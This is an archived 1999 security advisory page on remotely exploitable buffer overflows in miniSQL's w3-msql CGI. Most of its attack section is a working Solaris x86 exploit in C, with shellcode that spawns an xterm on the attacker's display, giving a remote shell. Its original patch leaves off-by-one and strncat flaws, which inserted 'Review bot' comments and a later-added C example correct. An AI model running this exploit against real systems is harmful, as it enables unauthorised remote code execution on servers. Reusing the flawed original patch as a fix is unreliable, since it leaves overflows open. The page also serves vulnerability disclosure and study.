<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<HTML>
<HEAD>
<META CONTENT="text/html; charset=iso-8859-1" HTTP-EQUIV="Content-Type">
<META NAME="GENERATOR" CONTENT="Mozilla/4.5 [es] (Win95; I) [Netscape]">
<TITLE>mi021</TITLE>
</HEAD>
<BODY BGCOLOR="#000000" VLINK="#66FFFF" TEXT="#33CCFF" LINK="#66FFFF" ALINK="#FFFFFF">
<TABLE WIDTH="90%" COLS="2" CELLSPACING="0" BORDER="0" CELLPADDING="0">
<TR>
<TD WIDTH="10%"></TD>
<TD WIDTH="90%">
<CENTER><B><I><U><FONT SIZE="+1">!Hispahack Research Team</FONT></U></I></B></CENTER>
<P> <B>Program:</B> w3-msql (miniSQL 2.0.4.1 - 2.0.11)
<BR> <B>Platform:</B> *nix
<BR> <B>Risk:</B> Remote access
<BR> <B>Author:</B> <B><I>Zhodiac <zhodiac@softhome.net></I></B>
<BR> <B>Date:</B> 24/12/1999
<BR>
<P> <B><U>- Problem:</U></B>
<P> The miniSQL distribution (<I><A HREF="http://hughes.com.au/">http://hughes.com.au</A></I>)
ships with a CGI program (w3-msql) that can be xploited to run arbitrary code under
the httpd uid.
<P> It has several overflows; the one xploited here is due to the misuse of
the scanf() function.
<P> We notified the programmer(s) about the problem one month
ago and have not received any reply yet.
<P><B> <U>- Exploit:</U></B>
<P> As proof of the vulnerability we release the Solaris
x86 xploit. But be aware: the absence of a public xploit for your system does not mean
you can't be hacked. The vulnerability exists, fix it!
<P>------- w3-msql-xploit.c ----------
<PRE>
/*
 * !Hispahack Research Team
 * http://hispahack.ccc.de
 *
 * Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11)
 *
 * Platform: Solaris x86
 *           Feel free to port it to other architectures, if you can...
 *           If so mail me plz.
 *
 * By: Zhodiac <zhodiac@softhome.net>
 *
 * Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c
 *        2) xhost +<target_ip>
 *        3) ./w3-msql-xploit <target> <display> | nc <target> <http_port>
 *        4) Take a cup of coffee, some kind of drug or whatever
 *           stimulates you at hacking time... while the xterm is coming
 *           or while you are getting raided.
 *
 * #include <standard/disclaimer.h>
 *
 * Madrid, 28/10/99
 *
 * Spain r0x
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/******************/
/* Customize this */
/******************/
//#define LEN_VAR 50     /* mSQL 2.0.4 - 2.0.10.1 */
#define LEN_VAR 128      /* mSQL 2.0.11 */

// Solaris x86
#define ADDR 0x8045f8

// Shellcode Solaris x86
char shellcode[]= /* By Zhodiac <zhodiac@softhome.net> */
  "\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06"
  "\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc"
  "\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe"
  "\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89"
  "\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0"
  "\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
  "\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
  "/bin/shA-cA/usr/openwin/bin/xtermA-displayA";

#define ADDR_TIMES 12
#define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16
#define NOP 0x90

int main (int argc, char *argv[]) {

  char *buf, *ptr;
  long addr=ADDR;
  int aux;

  if (argc<3){
    printf("Usage: %s target display | nc target 80 \n",argv[0]);
    exit(-1);
  }

  if ((buf=malloc(BUFSIZE))==NULL) {
    perror("malloc()");
    exit(-1);
  }

  shellcode[44]=(char)strlen(argv[2])+43;

  ptr=(char *)buf;
  memset(ptr,NOP,BUFSIZE-strlen(argv[2])-strlen(shellcode)-ADDR_TIMES*4);
  ptr+=BUFSIZE-strlen(shellcode)-strlen(argv[2])-ADDR_TIMES*4;
  memcpy(ptr,shellcode,strlen(shellcode));
  ptr+=strlen(shellcode);
  memcpy(ptr,argv[2],strlen(argv[2]));
  ptr+=strlen(argv[2]);

  for (aux=0;aux<ADDR_TIMES;aux++) {
    ptr[0] = (addr & 0x000000ff);
    ptr[1] = (addr & 0x0000ff00) >> 8;
    ptr[2] = (addr & 0x00ff0000) >> 16;
    ptr[3] = (addr & 0xff000000) >> 24;
    ptr+=4;
  }

  printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n");
  printf("Connection: Keep-Alive\n");
  printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n");
  printf("Host: %s\n",argv[1]);
  printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n");
  printf("Accept-Encoding: gzip\n");
  printf("Accept-Language: en\n");
  printf("Accept-Charset: iso-8859-1,*,utf-8\n");
  printf("Content-type: multipart/form-data\n");
  printf("Content-length: %i\n\n",BUFSIZE);

  printf("%s \n\n\n",buf);

  free(buf);

}
</PRE>
<P>------- w3-msql-xploit.c ---------
<BR>
<P> <B><U>- Fix:</U></B>
<BR>
<P> The best solution is to wait for a new patched version; meanwhile,
here is a patch that will stop this attack and some others (be aware
that this patch was done after a total revision of the code, and there may
still be other overflows).
<P>------ w3-msql.patch ---------
<P>410c410
<BR>< scanf("%s ", boundary);
<BR>---
<BR>> scanf("%128s ", boundary);
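<P>Review bot: the width in scanf("%128s ", boundary) is off by one if boundary is a 128-byte array, which is what the exploit's LEN_VAR 128 for mSQL 2.0.11 suggests: a %Ns conversion stores up to N characters plus the terminating NUL, so %128s can still write one byte past the end of the array. Use a width of sizeof(boundary)-1, i.e. scanf("%127s ", boundary), and keep the width tied to the array declaration so the two cannot drift apart.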
<BR>418c418
<BR>< strcat(var, buffer);
<BR>---
<BR>> strncat(var, buffer,sizeof(buffer));
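<P>Review bot: strncat(var, buffer, sizeof(buffer)) bounds the copy by the size of the source, not by the space left in the destination, so it does not prevent var from overflowing at all; the third argument of strncat is the maximum number of characters to append, and it must be computed from the destination. Use strncat(var, buffer, sizeof(var) - strlen(var) - 1) if var is an array, or pass the remaining length explicitly if var is a pointer.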
<BR>428c428
<BR>< scanf("
Content-Type: %s ", buffer);
<BR>---
<BR>> scanf("
Content-Type: %15360s ", buffer);
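<P>Review bot: same off-by-one as the boundary change: the exploit's BUFSIZE pads with 15*1024 bytes, which suggests buffer is 15360 bytes, and %15360s can write 15361 bytes once the NUL is counted. Use %15359s (sizeof(buffer)-1). Note also that the format string is shown split across two lines here; check that the applied patch keeps the leading newline directive and the rest of the format on one line, or the hunk will not apply cleanly.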
<P>------ w3-msql.patch ---------
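<P>The three patched lines share one rule: a scanf width must be one less than the array it fills, and strncat must be bounded by the room left in the destination, not by the size of the source. The C below is an added example written for this page, not code from the advisory or from the mSQL sources; the array sizes 128 and 15360 are assumptions taken from the exploit's LEN_VAR and 15*1024 constants, and the function names are the example's own.

```c
/* Added example (not from the advisory or mSQL): bounded parsing of the
 * two fields the w3-msql patch touches. Array sizes are ASSUMED from the
 * exploit's constants; substitute the real declarations from w3-msql.c. */
#include <stdio.h>
#include <string.h>

#define BOUNDARY_LEN   128    /* assumed size of boundary[] (LEN_VAR 128) */
#define BUFFER_LEN     15360  /* assumed size of buffer[]   (15*1024)     */

/* A %Ns conversion stores up to N characters plus a terminating NUL,
 * so the width must be one less than the array size. */
#define BOUNDARY_WIDTH 127
#define BUFFER_WIDTH   15359
_Static_assert(BOUNDARY_WIDTH + 1 == BOUNDARY_LEN, "scanf width must be array size minus one");
_Static_assert(BUFFER_WIDTH + 1 == BUFFER_LEN, "scanf width must be array size minus one");

/* Splice the numeric width into the format string at compile time, so the
 * format can never disagree with the array it fills. */
#define STR_(x) #x
#define STR(x)  STR_(x)
#define BOUNDARY_FMT "%" STR(BOUNDARY_WIDTH) "s"                /* "%127s"   */
#define CTYPE_FMT    "\nContent-Type: %" STR(BUFFER_WIDTH) "s"  /* "%15359s" */

/* Reads the multipart boundary token from one line into a BOUNDARY_LEN
 * array. Returns 1 on success, 0 if no token was present. */
int read_boundary(const char *line, char boundary[BOUNDARY_LEN])
{
    boundary[0] = '\0';
    return sscanf(line, BOUNDARY_FMT, boundary) == 1;
}

/* Reads the Content-Type value into a BUFFER_LEN array, same contract. */
int read_content_type(const char *line, char buffer[BUFFER_LEN])
{
    buffer[0] = '\0';
    return sscanf(line, CTYPE_FMT, buffer) == 1;
}

/* Characters that can still be appended to dst while leaving room for
 * the NUL. This, not sizeof(src), is the bound strncat needs. */
size_t remaining_space(const char *dst, size_t dst_size)
{
    size_t used = strlen(dst);
    return used + 1 >= dst_size ? 0 : dst_size - used - 1;
}

/* Appends src to dst without ever exceeding dst_size bytes in total.
 * Returns the resulting length of dst. */
size_t safe_append(char *dst, size_t dst_size, const char *src)
{
    strncat(dst, src, remaining_space(dst, dst_size));
    return strlen(dst);
}

/* Scenario: a constructed 300-character boundary is cut to BOUNDARY_WIDTH. */
size_t demo_boundary_length(void)
{
    char line[512];
    char boundary[BOUNDARY_LEN];
    memset(line, 'A', 300);
    line[300] = '\0';
    if (!read_boundary(line, boundary))
        return 0;
    return strlen(boundary);
}

/* Scenario: a normal header line parses intact. */
int demo_content_type_ok(void)
{
    char buffer[BUFFER_LEN];
    return read_content_type("\nContent-Type: text/plain\n", buffer)
        && strcmp(buffer, "text/plain") == 0;
}

/* Scenario: a constructed 16000-character value is cut to BUFFER_WIDTH. */
size_t demo_content_type_length(void)
{
    static char line[BUFFER_LEN + 1000];
    char buffer[BUFFER_LEN];
    const char *prefix = "\nContent-Type: ";
    size_t plen = strlen(prefix);
    memcpy(line, prefix, plen);
    memset(line + plen, 'B', 16000);
    line[plen + 16000] = '\0';
    if (!read_content_type(line, buffer))
        return 0;
    return strlen(buffer);
}

/* Scenario: appending an oversize string to a 16-byte array stays inside it. */
size_t demo_append_length(void)
{
    char var[16] = "abc";
    return safe_append(var, sizeof var, "defghijklmnopqrstuvwxyz");
}

int main(void)
{
    printf("boundary kept %zu of 300 chars\n", demo_boundary_length());
    printf("content-type kept %zu of 16000 chars\n", demo_content_type_length());
    printf("16-byte var ends at %zu chars\n", demo_append_length());
    return 0;
}
```

<P>Build it with the same gcc invocation the advisory uses for the exploit. The static assertions turn a mismatch between a width and its array into a compile error rather than a one-byte overflow, and remaining_space() is the bound the strncat hunk should have used.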
<P> piscis:~# patch w3-msql.c w3-msql.patch
<BR> piscis:~#
<P> Spain r0x
<P> Greetz :)
<P> <B><I>Zhodiac</I></B>
<BR>
<BR>
<BR>
</TD>
</TR>
</TABLE>
<CENTER>
<P><FONT SIZE="-1"> (C) 1997-2001 by !Hispahack</FONT>
<BR><FONT SIZE="-1">To view this site under the best conditions, use a resolution
of 800x600 and Netscape Navigator</FONT></CENTER>
</BODY>
</HTML>